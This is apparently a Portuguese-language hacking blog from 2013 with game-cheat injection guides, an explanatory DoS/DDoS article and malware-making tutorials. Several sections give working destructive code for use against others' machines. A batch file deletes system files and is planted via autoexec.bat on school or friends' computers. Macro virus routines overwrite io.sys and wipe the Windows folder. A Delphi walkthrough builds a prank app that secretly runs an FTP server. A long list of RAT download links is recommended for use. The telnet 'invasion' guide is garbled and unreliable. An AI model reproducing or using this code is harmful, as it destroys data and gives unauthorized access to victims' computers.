Ip Tools

Ip tools.. ferramenta de captura de Ip

Spy-net 2.6

Criador de Keyllogers

sábado, 2 de março de 2013

Aimbot - PB

Tutorial
PEGUE O hackPBlauth e cole na pasta ONGAME
Clique no ícone do Aimbot, irá abrir uma pasta, nessa pasta irá ter 5 itens, pegue o item " JogosxhackerPBLauncher "
e arraste para a pasta do Point Blank no Disco Local
Lá você clica com o botão direito sobre o Launcher e envie um atalho para sua Areá de Trabalho. A partir de agora você usará este Laucher e não mais o antigo!
Depois disso injete normalmente (modo manual) a dll do Aimbot quando aparecer as letrinhas brancas! (se vc usar windows 7 32 bits fassa o processo de deixar o pb
visivel com slach detective) Não prescisa desativar X-Trap
Quando o Pb carregar vai aparecer o menu dos hacks se vc quer que ele saia ou aparece aperte insert

Não voe muito alto com o Fly Hack ou tomará DC e não entre em lugares q vc n coseguiria chegar sem ele, como nas pistas de dino

Download aqui
Scan   aqui

SECRET - PW

Hoje eu vou posta um dos varios hackers de PW (Perfect World) que eu tenho!!

O nome desse e Secret - So funfa para MG - e de facio uso...
Voce abre ele e vai aparecer um quadrado com uma menssagem e um botao de OK
NAO CLIQUE EM OK POIS VAI FECHA SE TU CLICAR!!!

Depois de abri-lo nao deixe teu Lacre ou qualquer outro Stun no F1
Crie um combo foda e use  apertando F1

o que ele faz?
R. Ele usa todos os seus skills que estiverem no COMBO de uma vez so!!
(As palavras estao sem acento pq meu windowns ta com poblema e eu to tentando arruma mas ta osso)

::..Sem imagens..::

Download aqui

Scan aqui

sexta-feira, 1 de março de 2013

Ataque via DOS

De acordo com a definição do CERT (Computer Emergency Response Team), os ataques DoS (Denial of Service), também denominados Ataques de Negação de Serviços, consistem em tentativas de impedir usuários legítimos de utilizarem um determinado serviço de um computador. Para isso, são usadas técnicas que podem: sobrecarregar uma rede a tal ponto em que os verdadeiros usuários dela não consigam usá-la; derrubar uma conexão entre dois ou mais computadores; fazer tantas requisições a um site até que este não consiga mais ser acessado; negar acesso a um sistema ou a determinados usuários.

Explicando de maneira ilustrativa, imagine que você usa um ônibus regularmente para ir ao trabalho. No entanto, em um determinado dia, uma quantidade enorme de pessoas “furaram a fila” e entraram no veículo, deixando-o tão lotado que você e os outros passageiros regulares não conseguiram entrar. Ou então, imagine que você tenha conseguido entrar no ônibus, mas este ficou tão cheio que não conseguiu sair do lugar por excesso de peso. Este ônibus acabou negando o seu serviço – o de transportá-lo até um local -, pois recebeu mais solicitações – neste caso, passageiros – do que suporta.

É importante frisar que quando um computador/site sofre ataque DoS, ele não é invadido, mas sim sobrecarregado. Isso independe do sistema operacional utilizado.

Os ataques do tipo DoS mais comuns podem ser feitos devido a algumas características do protocolo TCP/IP (Transmission Control Protocol / Internet Protocol), sendo possível ocorrer em qualquer computador que o utilize. Uma das formas de ataque mais conhecidas é a SYN Flooding, onde um computador tenta estabelecer uma conexão com um servidor através de um sinal do TCP conhecido por SYN (Synchronize). Se o servidor atender o pedido de conexão, enviará ao computador solicitante um sinal chamado ACK (Acknowledgement). O problema é que em ataques desse tipo, o servidor não consegue responder a todas as solicitações e então passa a recusar novos pedidos.

Outra forma de ataque comum é o UPD Packet Storm, onde um computador faz solicitações constantes para que uma máquina remota envie pacotes de respostas ao solicitante. A máquina fica tão sobrecarregada que não consegue executar suas funções.
Ataques DDoS

O DDoS, sigla para Distributed Denial of Service, é um ataque DoS ampliado, ou seja, que utiliza até milhares de computadores para atacar uma determinada máquina. Esse é um dos tipos mais eficazes de ataques e já prejudicou sites conhecidos, tais como os da CNN, Amazon, Yahoo, Microsoft e eBay.

Para que os ataques do tipo DDoS sejam bem-sucedidos, é necessário que se tenha um número grande de computadores para fazerem parte do ataque. Uma das melhores formas encontradas para se ter tantas máquinas, foi inserir programas de ataque DDoS em vírus ou em softwares maliciosos.

Em um primeiro momento, os hackers que criavam ataques DDoS tentavam “escravizar” computadores que agiam como servidores na internet. Com o aumento na velocidade de acesso à internet, passou-se a existir interesse nos computadores dos usuários comuns com acesso banda larga, já que estes representam um número muito grande de máquinas na internet.

Para atingir a massa, isto é, a enorme quantidade de computadores conectados à internet, vírus foram e são criados com a intenção de disseminar pequenos programas para ataques DoS. Assim, quando um vírus com tal poder contamina um computador, este fica disponível para fazer parte de um ataque DoS e o usuário dificilmente fica sabendo que sua máquina está sendo utilizado para tais fins. Como a quantidade de computadores que participam do ataque é grande, é praticamente impossível saber exatamente qual é a máquina principal do ataque.

Quando o computador de um internauta comum é infectado com um vírus com funções para ataques DoS, este computador passa a ser chamado de zumbi. Após a contaminação, os zumbis entram em contato com máquinas chamadas de mestres, que por sua vez recebem orientações (quando, em qual site/computador, tipo de ataque, entre outros) de um computador chamado atacante. Após receberem as ordens, os computadores mestres as repassam aos computadores zumbis, que efetivamente executam o ataque. Um computador mestre pode ter sob sua responsabilidade até milhares de computadores. Repare que nestes casos, as tarefas de ataque DoS são distribuídas a um “exército” de máquinas escravizadas. Daí é que surgiu o nome Distributed Denial of Service. A imagem abaixo ilustra a hierarquia de computadores usadas em ataques DDoS.

Como exemplo real de ataques DDoS ajudados por vírus, tem-se os casos das pragas digitais Codered, Slammer e MyDoom. Existem outros, mas estes são os que conseguiram os maiores ataques já realizados.
Impedindo e detectando ataques DoS

Apesar de não existir nenhum meio que consiga impedir totalmente um ataque DoS, é possível detectar a presença de ataques ou de computadores (zumbis) de uma rede que estão participando de um DDoS. Para isso, basta observar se está havendo mais tráfego do que o normal (principalmente em casos de sites, seja ele um menos conhecido, como o InfoWester, seja ele um muito utilizado, como o Google), se há pacotes TCP e UDP que não fazem parte da rede ou se há pacotes com tamanho acima do normal. Outra dica importante é utilizar softwares de IDS (Intrusion Detection System – Sistema de Identificação de Intrusos).

Para prevenção, uma das melhores armas é verificar as atualizações de segurança dos sistemas operacionais e softwares utilizados pelos computadores. Muitos vírus aproveitam de vulnerabilidades para efetuar contaminações. Também é importante filtrar certos tipos de pacotes na rede e desativar serviços que não são usados

Como fazer o propio virus

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:
copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite "arquivo"no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um "autoexec.bat" com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto! Retire o disco e diga thau, hehe.

VEJA UM EXEMPLO DE VIRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04
Sub MAIN
If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then
DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”
Close #1
End if
Open “c:\autoexec.bat” For Output As #1
Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”
Close #1
End Sub

ROTINA 2

Sub MAIN
Open “C:\imaiden.txt” for Output As #1”
Print #1 “Código em hexadecimal”
Print #1 “Código em hexadecimal” ‘(continuação)...
Close #1
Shell “debug texto.txt”
Shell “c:\imaiden.com”
End Sub

ROTINA 3

Sub MAIN
MacroCopiar “Global:Inocu”, “DocumentoNovo”, 0
End sub

Vírus Fagundes Varela

Sub MAIN
InícioDocumento
Inserir “Lembra dessas noites”
Inserir CHR$(13)
Inserir “Cheias de doce harmonia,” aaa Inserir CHR$(13)
Inserir “Quando a floresta gemia” aa aaa Inserir CHR$(13)
Inserir “Do vento aos brandos açoites?”
Inserir CHR$(13)
Inserir CHR$(13)
Inserir “Quando as estrelas sorriam” aaa Inserir CHR$(13)
Inserir “Quando as campinas tremiam”
Inserir CHR$(13)
Inserir “Nas dobras do úmido véu?” aaa Inserir CHR$(13)
Inserir “E nossas almas unidas”
Inserir CHR$(13)
Inserir “Estreitavam-se, sentidas,” aaa Inserir CHR$(13)
Inserir “Ao brilhar daquele céu?” aaaArquivoImprimirPadrão
End Sub

Como criar um Trojan

Instalando os componentes necessários

Para que você possa construir o programa que será explicado aqui, é necessário que você possua componentes (objetos) de Internet. Nem sempre o
Delphi traz esses componentes, então preferi utilizar componentes extras.

Para baixar esses componentes vá em http://www.download.com/3001-2229-10151091.html e baixe-os.
Para instala-los descompacte o arquivo se for rar ou zip e com o Delphi aberto clique em Component e depois em Install Component.

Se você quiser instalar os componentes em um “pacote” (um conjunto de componentes) já existente, deixe selecionada a seção Into existing package.
Se quiser criar um novo pacote, clique em Into new package, logo depois vá em Package file name e coloque o arquivo que você irá criar.
Exemplo: c:\teste.dpk (todos os pacotes possuem extensão dpk). Procure onde está escrito Unit file name. Clique em Browse (o botão logo a frente).
Vá no diretório em que você descompactou os componentes e selecione todos. Clique ok depois para confirmar.
Se você selecionou a opção de criar um novo pacote, o Delphi irá mostrar uma mensagem dizendo que o pacote será construído e instalado. Clique Yes.
Caso a mensagem não apareça ou a opção de instalar em um pacote já existente foi selecionada, clique em Install ou Compile no quadrinho que
apareceu.Pronto. Os componentes estão instalados. Na paleta de componentes (Dialogs, System, Standard...) vai aparecer mais um nome na barra de
componentes: Fpiette.

Trojan simples

Nosso trojan consistirá em um mini-servidor FTP que ficará ativo na porta 2099 (se você tiver dúvidas
sobre como se conectar a servidores FTP e o que são portas, procure no fórum algo sobre portas e protocolos). Criaremos um programa em que
quando passamos o mouse em cima de um botão, esse some e aparece em outro local do formulário. É um daqueles programinhas bobos que vêm em
revistas com o nome de “ Inutilitários”. Mas a nossa intenção é que a pessoa o utilize sem desconfiar que seu computador está aberto para o mundo.
Vamos fazê-lo passo a passo.

· Coloque cinco botões no formulário do modo que demonstra a figura logo abaixo.
· Clique em cada um dos botões, vá em suas propriedades (mostradas no object inspector à esquerda) e mude o caption para “NÃO” (sem as aspas).
Apenas no local que um botão está ao lado do outro, coloque o caption do botão da esquerda como “SIM”.
· Selecione um label na barra de componentes (ilustrado com uma letra A) e coloque-o no formulário.
· Mude o caption do label para “Você ganhou na mega-sena. Deseja doar seu prêmio?”
· Vá nas propriedades do label, clique em Font (no espaço na frente da palavra Font). Clique no botãozinho com 3 pontinhos (...). Passe a fonte para
negrito (bold) e coloque o tamanho 14. O tamanho deve ficar como o da figura.
· Agora, novamente clique em cada um dos botões, com exceção dos dois que estão juntos, vá em suas propriedades e mude o valor de visible
(visível) de true para false. Ou seja, os botões ficarão invisíveis
(na hora de rodar o programa).

Já sacaram do que se trata? O que faremos é incitar a pessoa a responder NÃO (quem iria querer doar um prêmio desses?), só que o botão irá “fugir”
(na verdade o botão que o usuário passar o mouse em cima mudara seu status de visível para invisível e ao mesmo tempo outro dos botões escondidos
ficará visível, dando a impressão de que o botão correu.). Bom, vamos para a segunda etapa do nosso trojan. Siga novamente esses passos:

· Clique no primeiro dos botões em que está escrito NÃO para selecioná-lo. É o que está do lado do SIM.
· No Object Inspector, vá em Events e clique duas vezes na frente do evento OnMouseMove (é o evento
que controla quando passamos o mouse em cima de alguma coisa).
· Logo que a tela de código aparecer, escreva as seguintes linhas (sempre estando no meio do Begin e do End):

Button2.visible := false;
Button3.visible := true;

· Tome cuidado com o nome dos botões. Para que você siga exatamente como está aqui é necessário
que você tenha colocados os botões nessa ordem: Primeiro o SIM, depois o NÃO à sua direita, depois o NÃO que está a esquerda do formulário, o
NÃO que está na parte superior e por último o NÃO à direita do formulário. Se não colocou nessa ordem, apague os botões (clicando em cima deles e
apertando a tecla Delete) e coloque-os de novo seguindo os passos na página anterior. Isso é importante para que os nomes desses botões coincidam
com o exemplo.

Vamos repetir esses procedimentos com todos os outros botões NÃO. Começando pelo botão à esquerda do formulário. Novamente selecione-o, vá
em seus eventos (Events) e clique duas vezes em OnMouseMove. Coloque as seguintes linhas de código:

Button3.visible := false;
Button4.visible := true;

· Repita o procedimento com o botão NÃO no topo do formulário, inserindo o seguinte código:

Button4.visible := false;
Button5.visible := true;

· Calma aí gente, está quase acabando. Logo vou explicar o por quê dessas linhas de código. Agora o código do último botão NÃO à direita
do formulário:

Button5.visible := false;
Button2.visible := true;

· Agora para variar um pouco, façamos o seguinte: clique no botão SIM uma vez, vá em seus eventos e clique duas vezes no evento OnClick
(se quiser poupar trabalho, pode somente clicar duas vezes no botão SIM). Escreva o seguinte código:

Label1.Caption := “Você é muito bonzinho. Obrigado.”;

Rode o programa (F9) e veja o resultado. Gostou? Pois é, o processo é muito simples: cada vez que se passa o mouse em cima de um botão
(o qual podemos controlar usando o evento OnMouseMove) , esse botão vai mudar a sua propriedade visible para false
(se visível é falso, o botão está o quê?) e mandar o próximo botão mudar a sua propriedade visible para true. E isso irá se repetir continuamente.
Observe que no último código digitado, mandamos o botão de nome button2 ficar visível. Esse botão é o primeiro dos botões com o NÃO. Ou seja,
nesse ponto, começamos tudo de novo.
Bom, isso foi apenas o que o nosso programa fingirá fazer. Agora que já construímos o seu falso código, vamos implementar o nosso servidor FTP.

· Na barra de elementos, selecione FTPServer na paleta Fpiette e coloque-o no formulário.
· Clique no quadrinho do componente FTPServer, vá em suas propriedades e mude a porta (propriedade port) para 2099.
· Clique no formulário para selecioná-lo( Na parte vazia do formulário). Vá em seus eventos e clique duas vezes no evento OnCreate. Esse evento é
chamado todas as vezes que o programa é iniciado. Para nós é perfeito, não queremos que nosso trojan esteja ativo com o início do programinha? Escreva o seguinte código (nunca se esquecendo que ele deve ficar entre o Begin e o End):

FTPServer1.Start;

Esse comando fará com o que o servidor FTP se ative e monitore a porta 2099. Se você for ao prompt do ms-dos e executar
(com o programa rodando, é claro) ftp 127.0.0.1 2099, você se conectará ao trojan. Se quiser pode digitar a sintaxe do FTP direto pelo Windows,
indo em Iniciar / Executar (sem necessidade de abrir o prompt).
Tudo está quase terminado agora. Só nos restou um problema: e se estivermos puxando algum arquivo e a pessoa fechar o programa?
Nós iríamos ser desconectados. Para resolver esse problema, vamos “enganar” o usuário.

· Selecione o formulário clicando uma vez em cima dele. Nas propriedades, clique em duas vezes no símbolo “+” que está na frente da propriedade
BorderIcons. Logo que a propriedade se expandir, clique
na frente de biSystemMenu e selecione false. Isso fará com que aquele X que clicamos para fechar programas desapareça.
· Coloque um novo botão, e mude o caption para “Fechar”. Clique duas vezes nele para acessar o evento OnClick. Agora coloque o seguinte
código-fonte:

Form1.Visible := false;

Como não existe mais aquele pequeno X para fechar a aplicação, o usuário clicará no botão Fechar. Mas
na verdade, esse fechar apenas esconderá a aplicação. Ela ainda estará ativa e com o servidor FTP rodando bonitinho.

Nosso trojan está pronto. Ele é extremamente simples como deve ter dado para perceber, mas o meu interesse é que vocês tenham entendido como
sua estrutura funciona ao invés de somente ficarem lendo toneladas de códigos-fonte inúteis (como alguns livros trazem). A partir desse ponto a
criatividade e a imaginação ficam a cargo de vocês. Afinal, o programador nada mais é do que um artista. Renascentista.

Listão De Trojans

Sub-Seven 1.1 Trojan muito usado pelos Hackers, muito recomendando esse programa.
Download aqui

Sub-Seven 1.3 Trojan muito usado pelos Hackers, muito recomendando esse programa. Versão mais recente 1.9.
Download aqui

Sub-Seven 2.0 Trojan muito usado pelos Hackers, muito recomendando esse programa. Versão mais recente 2.0.
Download aqui

Sub-Seven 2.1 Trojan muito usado pelos Hackers, muito recomendando esse programa. Versão mais recente 2.1.
Download aqui

Sub-Seven 2.2 Trojan muito usado pelos Hackers, muito recomendando esse programa. Versão mais recente 2.2.
Download aqui

Back Orifice 2000 Back Orifice 2000 + install Shield + Pluing.
Download

Back Orifice 2000 Back Orifice 2000 + Pluing.
Download

Back Orifice 1.2 Back Orifice 1.2 cliente + servidor.
Download

Back Orifice 1.2 Linux Download

ProRat v1.9 FIX2.rar
BackOrifice.rar http://w14.easy-share.com/3424611.html

Beast v2.07.rar http://w14.easy-share.com/3424641.html

Nuclear RAT v1.0 PublicBeta 9.rar http://w14.easy-share.com/3424661.html

Bandook 1.1.rar http://w14.easy-share.com/3425391.html

Amiboide Uploader v1.0.rar http://w14.easy-share.com/3515371.html

Amiboide Uploader v2.0.rar http://w14.easy-share.com/3515381.html

BackOrifice.rar http://w14.easy-share.com/3515431.html

Bandook 1.0.rar http://w14.easy-share.com/3515461.html

Bandook 1.1.rar http://w14.easy-share.com/3515481.html

Beast Antidote 2.02 v1.01.rar http://w14.easy-share.com/3515471.html

Beast v1.90.rar http://w14.easy-share.com/3515591.html

Beast v1.91.rar http://w14.easy-share.com/3515651.html

beast 2.07.rar http://w14.easy-share.com/3515661.html

Beast v1.92.rar http://w14.easy-share.com/3515811.html

Beast v2.00.rar http://w14.easy-share.com/3515881.html

Beast v2.01.rar http://w14.easy-share.com/3515961.html

Beast v2.02.rar http://w14.easy-share.com/3516071.html

Beast v2.05.rar http://w14.easy-share.com/3516081.html

Beast v2.06.rar http://w14.easy-share.com/3516171.html

Beast v2.07.rar http://w14.easy-share.com/3516221.html

Blackcobra Uploader Beta 1.0.rar http://w14.easy-share.com/3516091.html

C.I.A v1.2 Public Beta.rar http://w14.easy-share.com/3516441.html

Assasin 2.0 Final.rar http://w14.easy-share.com/3516511.html

CFRATBETA.rar http://w14.easy-share.com/3516531.html

CIA 1.22b.rar http://w14.easy-share.com/3516691.html

Char0n.rar http://w14.easy-share.com/3516701.html

CIA v1.1.rar http://w14.easy-share.com/3516751.html

ColdFusionv1.00.rar http://w14.easy-share.com/3516801.html

CIA v1.23 PublicBeta 1.rar http://w14.easy-share.com/3516951.html

Hackeando a Escola

Este texto irá ensinar, de modo fácil, destruir o computadorzinho da sua escola (ou de amigo, trabalho, etc.).

Primeiro, crie em seu computador um arquivo de lote (nem precisa compilar), se não souber aí vai, pelo DOS digite:

copy con arquivo.bat ENTER

@echo off ENTER

@echo Frase de sua preferência ENTER

del *.sys ENTER

del *.exe ENTER

del *.com ENTER

cd windows ENTER

del *.* ENTER

cd\ ENTER

del arquivo.bat ENTER

@echo Frase de sua preferência ENTER

Aperte F6 ENTER



Pronto, um arquivo virus de lote foi criado em seu computador,ele não fara nada contanto que você não digite "arquivo" no diretorio onde ele está.
Remova este arquivo(arquivo.bat) para um disquete,junto a ele um " Autoexec.bat",com a linda de comando C:\arquivo.bat.

agora é com você! leve o disquete para a escola,trabalho,casa de amigo,etc. e quando tiver
 uma oportunidade,insira o disco na unidade referente(geralmente a:) e copie os arquivos os para o diretório
C:\. Pronto! Retire o disco e diga tchau.

Invasão por Telnet

Para hackear algo pela telnet e facio..

Abra o CMD.. digite : "telnet" (sem aspas) e aperte enter

digite logo apos a letra "o" de enter e logo abaixo digite o ip da pessoa ou site que vc que invadir!

de um espaço e coloque a porta que tu quer envadi de enter e espere conectar!

quando se aparecer "[TS]" ja pode se diser que envadiu!digite sel 8768 e dps cl para ter os dados!

e o resto dos comandos é so você digita "Help" !